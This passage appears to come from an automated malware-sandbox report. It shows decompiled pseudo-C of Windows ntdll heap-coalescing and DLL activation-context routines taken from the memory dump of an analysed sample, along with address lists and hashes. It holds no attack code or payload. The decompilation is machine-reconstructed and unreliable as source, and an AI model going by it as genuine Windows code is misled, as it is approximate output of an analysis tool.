					if(( *(_t81 + 0x240) & 0x00000001) != 0) {
						__eflags = E01687D50();
						if(__eflags != 0) {
							_t124 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
							__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x226;
						}
						E01721582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t124 & 0x000000ff);
					}
				}
				_t82 = E01687D50();
				_t125 = 0x7ffe038a;
				if(_t82 != 0) {
					_t85 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
				} else {
					_t85 = 0x7ffe038a;
				}
				if( *_t85 != 0) {
					__eflags = E01687D50();
					if(__eflags != 0) {
						_t125 =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
						__eflags =  *((intOrPtr*)( *[fs:0x30] + 0x50)) + 0x230;
					}
					E01721582(_t103, _t129,  *((intOrPtr*)(_t133 + 0x10)), __eflags,  *((intOrPtr*)(_t133 + 0x14)),  *(_t129 + 0x74) << 3,  *_t125 & 0x000000ff);
				}
				 *((intOrPtr*)(_t129 + 0x20c)) =  *((intOrPtr*)(_t129 + 0x20c)) + 1;
				_t91 =  *(_t103 + 2);
				if((_t91 & 0x00000004) != 0) {
					E016BD5E0( *((intOrPtr*)(_t133 + 0x18)),  *((intOrPtr*)(_t133 + 0x10)), 0xfeeefeee);
					_t91 =  *(_t103 + 2);
				}
				 *(_t103 + 2) = _t91 & 0x00000017;
				_t65 = 1;
				goto L13;
			}






























                    0x0168a229
                    0x0168a231
                    0x0168a23f
                    0x0168a242
                    0x0168a244
                    0x0168a24c
                    0x0168a255
                    0x0168a25a
                    0x0168a25f
                    0x016d1c76
                    0x016d1c78
                    0x016d1c7e
                    0x016d1c7f
                    0x016d1c81
                    0x016d1c82
                    0x016d1c84
                    0x016d1c89
                    0x016d1c8b
                    0x016d1c9e
                    0x016d1c9e
                    0x016d1cab
                    0x016d1cb2
                    0x00000000
                    0x016d1cb2
                    0x016d1c8d
                    0x016d1c92
                    0x00000000
                    0x00000000
                    0x016d1c94
                    0x016d1c98
                    0x00000000
                    0x00000000
                    0x00000000
                    0x016d1c98
                    0x0168a265
                    0x0168a265
                    0x0168a266
                    0x0168a26f
                    0x0168a270
                    0x0168a276
                    0x0168a277
                    0x0168a279
                    0x0168a27e
                    0x0168a282
                    0x016d1db5
                    0x016d1dbb
                    0x016d1dc1
                    0x016d1dc5
                    0x016d1de4
                    0x016d1de9
                    0x016d1dc7
                    0x016d1ddc
                    0x016d1de1
                    0x016d1def
                    0x016d1df3
                    0x016d1df7
                    0x016d1dfe
                    0x016d1e06
                    0x0168a302
                    0x0168a308
                    0x0168a308
                    0x0168a288
                    0x0168a28d
                    0x0168a294
                    0x016d1cc1
                    0x0168a29a
                    0x0168a29a
                    0x0168a29a
                    0x0168a29f
                    0x016d1ccb
                    0x016d1cd1
                    0x016d1cd8
                    0x016d1cea
                    0x016d1cea
                    0x016d1cd8
                    0x0168a2a9
                    0x0168a2af
                    0x0168a2bc
                    0x016d1cfd
                    0x0168a2c2
                    0x0168a2c2
                    0x0168a2c2
                    0x0168a2c7
                    0x016d1d07
                    0x016d1d0d
                    0x016d1d14
                    0x016d1d1f
                    0x016d1d21
                    0x016d1d2c
                    0x016d1d2c
                    0x016d1d2c
                    0x016d1d47
                    0x016d1d47
                    0x016d1d14
                    0x0168a2cd
                    0x0168a2d2
                    0x0168a2d9
                    0x016d1d5a
                    0x0168a2df
                    0x0168a2df
                    0x0168a2df
                    0x0168a2e4
                    0x016d1d69
                    0x016d1d6b
                    0x016d1d76
                    0x016d1d76
                    0x016d1d76
                    0x016d1d91
                    0x016d1d91
                    0x0168a2ea
                    0x0168a2f0
                    0x0168a2f5
                    0x016d1da8
                    0x016d1dad
                    0x016d1dad
                    0x0168a2fd
                    0x0168a300
                    0x00000000

                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: HEAP: $HEAP[%wZ]: $ZwAllocateVirtualMemory failed %lx for heap %p (base %p, size %Ix)$`
                    • API String ID: 2994545307-2586055223
                    • Opcode ID: 6058ce4c67a8907ef968f41fe1e3d052815e53572882e8af38bdeea6cc3803f8
                    • Instruction ID: 74d1e69359a257b46d5e81bc3306386b75eadee12caa0e5e27dd4f1332a36dd1
                    • Opcode Fuzzy Hash: 6058ce4c67a8907ef968f41fe1e3d052815e53572882e8af38bdeea6cc3803f8
                    • Instruction Fuzzy Hash: 315112326046819FE322EBA8CC54F67BBE9FF81B10F180669F951CB392D764D941CB61
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 01698E00 Relevance: 5.1, Strings: 4, Instructions: 126COMMON
                    Download Yara Rule
                    C-Code - Quality: 44%
                    			E01698E00(void* __ecx) {
				signed int _v8;
				char _v12;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr* _t32;
				intOrPtr _t35;
				intOrPtr _t43;
				void* _t46;
				intOrPtr _t47;
				void* _t48;
				signed int _t49;
				void* _t50;
				intOrPtr* _t51;
				signed int _t52;
				void* _t53;
				intOrPtr _t55;

				_v8 =  *0x175d360 ^ _t52;
				_t49 = 0;
				_t48 = __ecx;
				_t55 =  *0x1758464; // 0x761c0110
				if(_t55 == 0) {
					L9:
					if( !_t49 >= 0) {
						if(( *0x1755780 & 0x00000003) != 0) {
							E016E5510("minkernel\\ntdll\\ldrsnap.c", 0x2b5, "LdrpFindDllActivationContext", 0, "Querying the active activation context failed with status 0x%08lx\n", _t49);
						}
						if(( *0x1755780 & 0x00000010) != 0) {
							asm("int3");
						}
					}
					return E016AB640(_t49, 0, _v8 ^ _t52, _t47, _t48, _t49);
				}
				_t47 =  *((intOrPtr*)(__ecx + 0x18));
				_t43 =  *0x1757984; // 0x1202b88
				if( *((intOrPtr*)( *[fs:0x30] + 0x1f8)) == 0 || __ecx != _t43) {
					_t32 =  *((intOrPtr*)(_t48 + 0x28));
					if(_t48 == _t43) {
						_t50 = 0x5c;
						if( *_t32 == _t50) {
							_t46 = 0x3f;
							if( *((intOrPtr*)(_t32 + 2)) == _t46 &&  *((intOrPtr*)(_t32 + 4)) == _t46 &&  *((intOrPtr*)(_t32 + 6)) == _t50 &&  *((intOrPtr*)(_t32 + 8)) != 0 &&  *((short*)(_t32 + 0xa)) == 0x3a &&  *((intOrPtr*)(_t32 + 0xc)) == _t50) {
								_t32 = _t32 + 8;
							}
						}
					}
					_t51 =  *0x1758464; // 0x761c0110
					 *0x175b1e0(_t47, _t32,  &_v12);
					_t49 =  *_t51();
					if(_t49 >= 0) {
						L8:
						_t35 = _v12;
						if(_t35 != 0) {
							if( *((intOrPtr*)(_t48 + 0x48)) != 0) {
								E01699B10( *((intOrPtr*)(_t48 + 0x48)));
								_t35 = _v12;
							}
							 *((intOrPtr*)(_t48 + 0x48)) = _t35;
						}
						goto L9;
					}
					if(_t49 != 0xc000008a) {
						if(_t49 != 0xc000008b && _t49 != 0xc0000089 && _t49 != 0xc000000f && _t49 != 0xc0000204 && _t49 != 0xc0000002) {
							if(_t49 != 0xc00000bb) {
								goto L8;
							}
						}
					}
					if(( *0x1755780 & 0x00000005) != 0) {
						_push(_t49);
						E016E5510("minkernel\\ntdll\\ldrsnap.c", 0x298, "LdrpFindDllActivationContext", 2, "Probing for the manifest of DLL \"%wZ\" failed with status 0x%08lx\n", _t48 + 0x24);
						_t53 = _t53 + 0x1c;
					}
					_t49 = 0;
					goto L8;
				} else {
					goto L9;
				}
			}




















                    0x01698e0f
                    0x01698e16
                    0x01698e19
                    0x01698e1b
                    0x01698e21
                    0x01698e7f
                    0x01698e85
                    0x016d9354
                    0x016d936c
                    0x016d9371
                    0x016d937b
                    0x016d9381
                    0x016d9381
                    0x016d937b
                    0x01698e9d
                    0x01698e9d
                    0x01698e29
                    0x01698e2c
                    0x01698e38
                    0x01698e3e
                    0x01698e43
                    0x01698eb5
                    0x01698eb9
                    0x016d92aa
                    0x016d92af
                    0x016d92e8
                    0x016d92e8
                    0x016d92af
                    0x01698eb9
                    0x01698e45
                    0x01698e53
                    0x01698e5b
                    0x01698e5f
                    0x01698e78
                    0x01698e78
                    0x01698e7d
                    0x01698ec3
                    0x01698ecd
                    0x01698ed2
                    0x01698ed2
                    0x01698ec5
                    0x01698ec5
                    0x00000000
                    0x01698e7d
                    0x01698e67
                    0x01698ea4
                    0x016d931a
                    0x00000000
                    0x00000000
                    0x016d9320
                    0x01698ea4
                    0x01698e70
                    0x016d9325
                    0x016d9340
                    0x016d9345
                    0x016d9345
                    0x01698e76
                    0x00000000
                    0x00000000
                    0x00000000
                    0x00000000

                    Strings
                    • LdrpFindDllActivationContext, xrefs: 016D9331, 016D935D
                    • minkernel\ntdll\ldrsnap.c, xrefs: 016D933B, 016D9367
                    • Querying the active activation context failed with status 0x%08lx, xrefs: 016D9357
                    • Probing for the manifest of DLL "%wZ" failed with status 0x%08lx, xrefs: 016D932A
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID:
                    • String ID: LdrpFindDllActivationContext$Probing for the manifest of DLL "%wZ" failed with status 0x%08lx$Querying the active activation context failed with status 0x%08lx$minkernel\ntdll\ldrsnap.c
                    • API String ID: 0-3779518884
                    • Opcode ID: 7e73133a7915caa3df9c509ceef28605151f16d7ebe7fbf2767e25b2a4ef0595
                    • Instruction ID: de590c4c248d446e98fa85748372c8aa7feb1e6cc8a280bf10b238ee4df080f0
                    • Opcode Fuzzy Hash: 7e73133a7915caa3df9c509ceef28605151f16d7ebe7fbf2767e25b2a4ef0595
                    • Instruction Fuzzy Hash: 95411A32A0031D9FEF35AA1DCC68A757BBDBB43358F06856DE90557292E7B0AC8087C1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 017249A4 Relevance: 5.1, Strings: 4, Instructions: 114COMMON
                    Download Yara Rule
                    Strings
                    Memory Dump Source
                    • Source File: 00000002.00000002.319763701.0000000001640000.00000040.00000800.00020000.00000000.sdmp, Offset: 01640000, based on PE: true
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_2_2_1640000_idczzzzbpy.jbxd
                    Similarity
                    • API ID: InitializeThunk
                    • String ID: This is located in the %s field of the heap header.$HEAP: $HEAP[%wZ]: $Heap %p - headers modified (%p is %lx instead of %lx)
                    • API String ID: 2994545307-336120773
                    • Opcode ID: fe4bc961efd47d6cff61cba8b2b780daa050b42ca2c40c036857dc6674bc6ab8
                    • Instruction ID: 0c7eafb1059d8968b9598712080df68e66b18669d78f2d856d29c1a1a9ec7891
                    • Opcode Fuzzy Hash: fe4bc961efd47d6cff61cba8b2b780daa050b42ca2c40c036857dc6674bc6ab8
                    • Instruction Fuzzy Hash: 3F310172200160EFD320DB99CC89F6AF7B9EF05A25F1540A9F907CB241D670AA81CB6D
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Function 016899BF Relevance: 4.3, Strings: 3, Instructions: 572COMMONCrypto
                    Download Yara Rule
                    C-Code - Quality: 78%
                    			E016899BF(signed int __ecx, signed short* __edx, signed int* _a4, signed int _a8) {
				char _v5;
				signed int _v12;
				signed int _v16;
				signed short _v20;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				signed short _t186;
				intOrPtr _t187;
				signed short _t190;
				signed int _t196;
				signed short _t197;
				intOrPtr _t203;
				signed int _t207;
				signed int _t210;
				signed short _t215;
				intOrPtr _t216;
				signed short _t219;
				signed int _t221;
				signed short _t222;
				intOrPtr _t228;
				signed int _t232;
				signed int _t235;
				signed int _t250;
				signed short _t251;
				intOrPtr _t252;
				signed short _t254;
				intOrPtr _t255;
				signed int _t258;
				signed int _t259;
				signed short _t262;
				intOrPtr _t271;
				signed int _t279;
				signed int _t282;
				signed int _t284;
				signed int _t286;
				intOrPtr _t292;
				signed int _t296;
				signed int _t299;
				signed int _t307;
				signed int* _t309;
				signed short* _t311;
				signed short* _t313;
				signed char _t314;
				intOrPtr _t316;
				signed int _t323;
				signed char _t328;
				signed short* _t330;
				signed char _t331;
				intOrPtr _t335;
				signed int _t342;
				signed char _t347;
				signed short* _t348;
				signed short* _t350;
				signed short _t352;
				signed char _t354;
				intOrPtr _t357;
				intOrPtr* _t364;
				signed char _t365;
				intOrPtr _t366;
				signed int _t373;
				signed char _t378;
				signed int* _t381;
				signed int _t382;
				signed short _t384;
				signed int _t386;
				unsigned int _t390;
				signed int _t393;
				signed int* _t394;
				unsigned int _t398;
				signed short _t400;
				signed short _t402;
				signed int _t404;
				signed int _t407;
				unsigned int _t411;
				signed short* _t414;
				signed int _t415;
				signed short* _t419;
				signed int* _t420;
				void* _t421;

				_t414 = __edx;
				_t307 = __ecx;
				_t419 = __edx - (( *(__edx + 4) & 0x0000ffff ^  *(__ecx + 0x54) & 0x0000ffff) << 3);
				if(_t419 == __edx || (( *(__ecx + 0x4c) >> 0x00000014 &  *(__ecx + 0x52) ^ _t419[1]) & 0x00000001) != 0) {
					_v5 = _a8;
					L3:
					_t381 = _a4;
					goto L4;
				} else {
					__eflags =  *(__ecx + 0x4c);
					if( *(__ecx + 0x4c) != 0) {
						_t411 =  *(__ecx + 0x50) ^  *_t419;
						 *_t419 = _t411;
						_t378 = _t411 >> 0x00000010 ^ _t411 >> 0x00000008 ^ _t411;
						__eflags = _t411 >> 0x18 - _t378;
						if(__eflags != 0) {
							_push(_t378);
							E0171FA2B(__ecx, __ecx, _t419, __edx, _t419, __eflags);
						}
					}
					_t250 = _a8;
					_v5 = _t250;
					__eflags = _t250;
					if(_t250 != 0) {
						_t400 = _t414[6];
						_t53 =  &(_t414[4]); // -16
						_t348 = _t53;
						_t251 =  *_t348;
						_v12 = _t251;
						_v16 = _t400;
						_t252 =  *((intOrPtr*)(_t251 + 4));
						__eflags =  *_t400 - _t252;
						if( *_t400 != _t252) {
							L49:
							_push(_t348);
							_push( *_t400);
							E0172A80D(_t307, 0xd, _t348, _t252);
							L50:
							_v5 = 0;
							goto L11;
						}
						__eflags =  *_t400 - _t348;
						if( *_t400 != _t348) {
							goto L49;
						}
						 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
						_t407 =  *(_t307 + 0xb4);
						__eflags = _t407;
						if(_t407 == 0) {
							L36:
							_t364 = _v16;
							_t282 = _v12;
							 *_t364 = _t282;
							 *((intOrPtr*)(_t282 + 4)) = _t364;
							__eflags = _t414[1] & 0x00000008;
							if((_t414[1] & 0x00000008) == 0) {
								L39:
								_t365 = _t414[1];
								__eflags = _t365 & 0x00000004;
								if((_t365 & 0x00000004) != 0) {
									_t284 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
									_v12 = _t284;
									__eflags = _t365 & 0x00000002;
									if((_t365 & 0x00000002) != 0) {
										__eflags = _t284 - 4;
										if(_t284 > 4) {
											_t284 = _t284 - 4;
											__eflags = _t284;
											_v12 = _t284;
										}
									}
									_t78 =  &(_t414[8]); // -8
									_t286 = E016BD540(_t78, _t284, 0xfeeefeee);
									_v16 = _t286;
									__eflags = _t286 - _v12;
									if(_t286 != _v12) {
										_t366 =  *[fs:0x30];
										__eflags =  *(_t366 + 0xc);
										if( *(_t366 + 0xc) == 0) {
											_push("HEAP: ");
											E0166B150();
										} else {
											E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
										}
										_push(_v16 + 0x10 + _t414);
										E0166B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
										_t292 =  *[fs:0x30];
										_t421 = _t421 + 0xc;
										__eflags =  *((char*)(_t292 + 2));
										if( *((char*)(_t292 + 2)) != 0) {
											 *0x1756378 = 1;
											asm("int3");
											 *0x1756378 = 0;
										}
									}
								}
								goto L50;
							}
							_t296 = E0168A229(_t307, _t414);
							__eflags = _t296;
							if(_t296 != 0) {
								goto L39;
							} else {
								E0168A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
								goto L50;
							}
						} else {
							_t373 =  *_t414 & 0x0000ffff;
							while(1) {
								__eflags = _t373 -  *((intOrPtr*)(_t407 + 4));
								if(_t373 <  *((intOrPtr*)(_t407 + 4))) {
									_t301 = _t373;
									break;
								}
								_t299 =  *_t407;
								__eflags = _t299;
								if(_t299 == 0) {
									_t301 =  *((intOrPtr*)(_t407 + 4)) - 1;
									__eflags =  *((intOrPtr*)(_t407 + 4)) - 1;
									break;
								} else {
									_t407 = _t299;
									continue;
								}
							}
							_t62 =  &(_t414[4]); // -16
							E0168BC04(_t307, _t407, 1, _t62, _t301, _t373);
							goto L36;
						}
					}
					L11:
					_t402 = _t419[6];
					_t25 =  &(_t419[4]); // -16
					_t350 = _t25;
					_t254 =  *_t350;
					_v12 = _t254;
					_v20 = _t402;
					_t255 =  *((intOrPtr*)(_t254 + 4));
					__eflags =  *_t402 - _t255;
					if( *_t402 != _t255) {
						L61:
						_push(_t350);
						_push( *_t402);
						E0172A80D(_t307, 0xd, _t350, _t255);
						goto L3;
					}
					__eflags =  *_t402 - _t350;
					if( *_t402 != _t350) {
						goto L61;
					}
					 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t419 & 0x0000ffff);
					_t404 =  *(_t307 + 0xb4);
					__eflags = _t404;
					if(_t404 == 0) {
						L20:
						_t352 = _v20;
						_t258 = _v12;
						 *_t352 = _t258;
						 *(_t258 + 4) = _t352;
						__eflags = _t419[1] & 0x00000008;
						if((_t419[1] & 0x00000008) != 0) {
							_t259 = E0168A229(_t307, _t419);
							__eflags = _t259;
							if(_t259 != 0) {
								goto L21;
							} else {
								E0168A309(_t307, _t419,  *_t419 & 0x0000ffff, 1);
								goto L3;
							}
						}
						L21:
						_t354 = _t419[1];
						__eflags = _t354 & 0x00000004;
						if((_t354 & 0x00000004) != 0) {
							_t415 = ( *_t419 & 0x0000ffff) * 8 - 0x10;
							__eflags = _t354 & 0x00000002;
							if((_t354 & 0x00000002) != 0) {
								__eflags = _t415 - 4;
								if(_t415 > 4) {
									_t415 = _t415 - 4;
									__eflags = _t415;
								}
							}
							_t91 =  &(_t419[8]); // -8
							_t262 = E016BD540(_t91, _t415, 0xfeeefeee);
							_v20 = _t262;
							__eflags = _t262 - _t415;
							if(_t262 != _t415) {
								_t357 =  *[fs:0x30];
								__eflags =  *(_t357 + 0xc);
								if( *(_t357 + 0xc) == 0) {
									_push("HEAP: ");
									E0166B150();
								} else {
									E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
								}
								_push(_v20 + 0x10 + _t419);
								E0166B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t419);
								_t271 =  *[fs:0x30];
								_t421 = _t421 + 0xc;
								__eflags =  *((char*)(_t271 + 2));
								if( *((char*)(_t271 + 2)) != 0) {
									 *0x1756378 = 1;
									asm("int3");
									 *0x1756378 = 0;
								}
							}
						}
						_t381 = _a4;
						_t414 = _t419;
						_t419[1] = 0;
						_t419[3] = 0;
						 *_t381 =  *_t381 + ( *_t419 & 0x0000ffff);
						 *_t419 =  *_t381;
						 *(_t419 + 4 +  *_t381 * 8) =  *_t381 ^  *(_t307 + 0x54);
						L4:
						_t420 = _t414 +  *_t381 * 8;
						if( *(_t307 + 0x4c) == 0) {
							L6:
							while((( *(_t307 + 0x4c) >> 0x00000014 &  *(_t307 + 0x52) ^ _t420[0]) & 0x00000001) == 0) {
								__eflags =  *(_t307 + 0x4c);
								if( *(_t307 + 0x4c) != 0) {
									_t390 =  *(_t307 + 0x50) ^  *_t420;
									 *_t420 = _t390;
									_t328 = _t390 >> 0x00000010 ^ _t390 >> 0x00000008 ^ _t390;
									__eflags = _t390 >> 0x18 - _t328;
									if(__eflags != 0) {
										_push(_t328);
										E0171FA2B(_t307, _t307, _t420, _t414, _t420, __eflags);
									}
								}
								__eflags = _v5;
								if(_v5 == 0) {
									L94:
									_t382 = _t420[3];
									_t137 =  &(_t420[2]); // -16
									_t309 = _t137;
									_t186 =  *_t309;
									_v20 = _t186;
									_v16 = _t382;
									_t187 =  *((intOrPtr*)(_t186 + 4));
									__eflags =  *_t382 - _t187;
									if( *_t382 != _t187) {
										L63:
										_push(_t309);
										_push( *_t382);
										_push(_t187);
										_push(_t309);
										_push(0xd);
										L64:
										E0172A80D(_t307);
										continue;
									}
									__eflags =  *_t382 - _t309;
									if( *_t382 != _t309) {
										goto L63;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t420 & 0x0000ffff);
									_t393 =  *(_t307 + 0xb4);
									__eflags = _t393;
									if(_t393 == 0) {
										L104:
										_t330 = _v16;
										_t190 = _v20;
										 *_t330 = _t190;
										 *(_t190 + 4) = _t330;
										__eflags = _t420[0] & 0x00000008;
										if((_t420[0] & 0x00000008) == 0) {
											L107:
											_t331 = _t420[0];
											__eflags = _t331 & 0x00000004;
											if((_t331 & 0x00000004) != 0) {
												_t196 = ( *_t420 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t196;
												__eflags = _t331 & 0x00000002;
												if((_t331 & 0x00000002) != 0) {
													__eflags = _t196 - 4;
													if(_t196 > 4) {
														_t196 = _t196 - 4;
														__eflags = _t196;
														_v12 = _t196;
													}
												}
												_t162 =  &(_t420[4]); // -8
												_t197 = E016BD540(_t162, _t196, 0xfeeefeee);
												_v20 = _t197;
												__eflags = _t197 - _v12;
												if(_t197 != _v12) {
													_t335 =  *[fs:0x30];
													__eflags =  *(_t335 + 0xc);
													if( *(_t335 + 0xc) == 0) {
														_push("HEAP: ");
														E0166B150();
													} else {
														E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t420);
													E0166B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t420);
													_t203 =  *[fs:0x30];
													__eflags =  *((char*)(_t203 + 2));
													if( *((char*)(_t203 + 2)) != 0) {
														 *0x1756378 = 1;
														asm("int3");
														 *0x1756378 = 0;
													}
												}
											}
											_t394 = _a4;
											_t414[1] = 0;
											_t414[3] = 0;
											 *_t394 =  *_t394 + ( *_t420 & 0x0000ffff);
											 *_t414 =  *_t394;
											 *(_t414 + 4 +  *_t394 * 8) =  *_t394 ^  *(_t307 + 0x54);
											break;
										}
										_t207 = E0168A229(_t307, _t420);
										__eflags = _t207;
										if(_t207 != 0) {
											goto L107;
										}
										E0168A309(_t307, _t420,  *_t420 & 0x0000ffff, 1);
										continue;
									}
									_t342 =  *_t420 & 0x0000ffff;
									while(1) {
										__eflags = _t342 -  *((intOrPtr*)(_t393 + 4));
										if(_t342 <  *((intOrPtr*)(_t393 + 4))) {
											break;
										}
										_t210 =  *_t393;
										__eflags = _t210;
										if(_t210 == 0) {
											_t212 =  *((intOrPtr*)(_t393 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t393 + 4)) - 1;
											L103:
											_t146 =  &(_t420[2]); // -16
											E0168BC04(_t307, _t393, 1, _t146, _t212, _t342);
											goto L104;
										}
										_t393 = _t210;
									}
									_t212 = _t342;
									goto L103;
								} else {
									_t384 = _t414[6];
									_t102 =  &(_t414[4]); // -16
									_t311 = _t102;
									_t215 =  *_t311;
									_v20 = _t215;
									_v16 = _t384;
									_t216 =  *((intOrPtr*)(_t215 + 4));
									__eflags =  *_t384 - _t216;
									if( *_t384 != _t216) {
										L92:
										_push(_t311);
										_push( *_t384);
										E0172A80D(_t307, 0xd, _t311, _t216);
										L93:
										_v5 = 0;
										goto L94;
									}
									__eflags =  *_t384 - _t311;
									if( *_t384 != _t311) {
										goto L92;
									}
									 *((intOrPtr*)(_t307 + 0x74)) =  *((intOrPtr*)(_t307 + 0x74)) - ( *_t414 & 0x0000ffff);
									_t386 =  *(_t307 + 0xb4);
									__eflags = _t386;
									if(_t386 == 0) {
										L79:
										_t313 = _v16;
										_t219 = _v20;
										 *_t313 = _t219;
										 *(_t219 + 4) = _t313;
										__eflags = _t414[1] & 0x00000008;
										if((_t414[1] & 0x00000008) == 0) {
											L82:
											_t314 = _t414[1];
											__eflags = _t314 & 0x00000004;
											if((_t314 & 0x00000004) != 0) {
												_t221 = ( *_t414 & 0x0000ffff) * 8 - 0x10;
												_v12 = _t221;
												__eflags = _t314 & 0x00000002;
												if((_t314 & 0x00000002) != 0) {
													__eflags = _t221 - 4;
													if(_t221 > 4) {
														_t221 = _t221 - 4;
														__eflags = _t221;
														_v12 = _t221;
													}
												}
												_t127 =  &(_t414[8]); // -8
												_t222 = E016BD540(_t127, _t221, 0xfeeefeee);
												_v20 = _t222;
												__eflags = _t222 - _v12;
												if(_t222 != _v12) {
													_t316 =  *[fs:0x30];
													__eflags =  *(_t316 + 0xc);
													if( *(_t316 + 0xc) == 0) {
														_push("HEAP: ");
														E0166B150();
													} else {
														E0166B150("HEAP[%wZ]: ",  *((intOrPtr*)( *((intOrPtr*)( *[fs:0x30] + 0xc)) + 0xc)) + 0x2c);
													}
													_push(_v20 + 0x10 + _t414);
													E0166B150("HEAP: Free Heap block %p modified at %p after it was freed\n", _t414);
													_t228 =  *[fs:0x30];
													_t421 = _t421 + 0xc;
													__eflags =  *((char*)(_t228 + 2));
													if( *((char*)(_t228 + 2)) != 0) {
														 *0x1756378 = 1;
														asm("int3");
														 *0x1756378 = 0;
													}
												}
											}
											goto L93;
										}
										_t232 = E0168A229(_t307, _t414);
										__eflags = _t232;
										if(_t232 != 0) {
											goto L82;
										}
										E0168A309(_t307, _t414,  *_t414 & 0x0000ffff, 1);
										goto L93;
									}
									_t323 =  *_t414 & 0x0000ffff;
									while(1) {
										__eflags = _t323 -  *((intOrPtr*)(_t386 + 4));
										if(_t323 <  *((intOrPtr*)(_t386 + 4))) {
											break;
										}
										_t235 =  *_t386;
										__eflags = _t235;
										if(_t235 == 0) {
											_t237 =  *((intOrPtr*)(_t386 + 4)) - 1;
											__eflags =  *((intOrPtr*)(_t386 + 4)) - 1;
											L78:
											_t111 =  &(_t414[4]); // -16
											E0168BC04(_t307, _t386, 1, _t111, _t237, _t323);
											goto L79;
										}
										_t386 = _t235;
									}
									_t237 = _t323;
									goto L78;
								}
							}
							return _t414;
						}
						_t398 =  *(_t307 + 0x50) ^  *_t420;
						_t347 = _t398 >> 0x00000010 ^ _t398 >> 0x00000008 ^ _t398;
						if(_t398 >> 0x18 != _t347) {
							_push(_t347);
							_push(0);
							_push(0);
							_push(_t420);
							_push(3);
							goto L64;
						}
						goto L6;
					} else {
						_t277 =  *_t419 & 0x0000ffff;
						_v16 = _t277;
						while(1) {
							__eflags = _t277 -  *((intOrPtr*)(_t404 + 4));
							if(_t277 <  *((intOrPtr*)(_t404 + 4))) {
								break;
							}
							_t279 =  *_t404;
							__eflags = _t279;
							if(_t279 == 0) {
								_t277 =  *((intOrPtr*)(_t404 + 4)) - 1;
								__eflags =  *((intOrPtr*)(_t404 + 4)) - 1;
								break;
							} else {
								_t404 = _t279;
								_t277 =  *_t419 & 0x0000ffff;
								continue;
							}
						}
						E0168BC04(_t307, _t404, 1, _t350, _t277, _v16);
						goto L20;
					}
				}
			}




















































































                    0x016899ca
                    0x016899cc
                    0x016899df
                    0x016899e3
                    0x016899f8
                    0x016899fb
                    0x016899fb
                    0x00000000
                    0x01689a48
                    0x01689a48
                    0x01689a4c
                    0x01689a51
                    0x01689a55
                    0x01689a61
                    0x01689a66
                    0x01689a68
                    0x016d1457
                    0x016d145c
                    0x016d145c
                    0x01689a68
                    0x01689a6e
                    0x01689a71
                    0x01689a74
                    0x01689a76
                    0x016d1466
                    0x016d1469
                    0x016d1469
                    0x016d146c
                    0x016d146e
                    0x016d1471
                    0x016d1474
                    0x016d1477
                    0x016d1479
                    0x016d159c
                    0x016d159c
                    0x016d159d
                    0x016d15a6
                    0x016d15ab
                    0x016d15ab
                    0x00000000
                    0x016d15ab
                    0x016d147f
                    0x016d1481
                    0x00000000
                    0x00000000
                    0x016d148a
                    0x016d148d
                    0x016d1493
                    0x016d1495
                    0x016d14c0
                    0x016d14c0
                    0x016d14c3
                    0x016d14c6
                    0x016d14c8
                    0x016d14cb
                    0x016d14cf
                    0x016d14f2
                    0x016d14f2
                    0x016d14f5
                    0x016d14f8
                    0x016d1501
                    0x016d1508
                    0x016d150b
                    0x016d150e
                    0x016d1510
                    0x016d1513
                    0x016d1515
                    0x016d1515
                    0x016d1518
                    0x016d1518
                    0x016d1513
                    0x016d1521
                    0x016d1525
                    0x016d152a
                    0x016d152d
                    0x016d1530
                    0x016d1532
                    0x016d1539
                    0x016d153d
                    0x016d155d
                    0x016d1562
                    0x016d153f
                    0x016d1555
                    0x016d155a
                    0x016d1570
                    0x016d1577
                    0x016d157c
                    0x016d1582
                    0x016d1585
                    0x016d1589
                    0x016d158b
                    0x016d1592
                    0x016d1593
                    0x016d1593
                    0x016d1589
                    0x016d1530
                    0x00000000
                    0x016d14f8
                    0x016d14d5
                    0x016d14da
                    0x016d14dc
                    0x00000000
                    0x016d14de
                    0x016d14e8
                    0x00000000
                    0x016d14e8
                    0x016d1497
                    0x016d1497
                    0x016d14a4
                    0x016d14a4
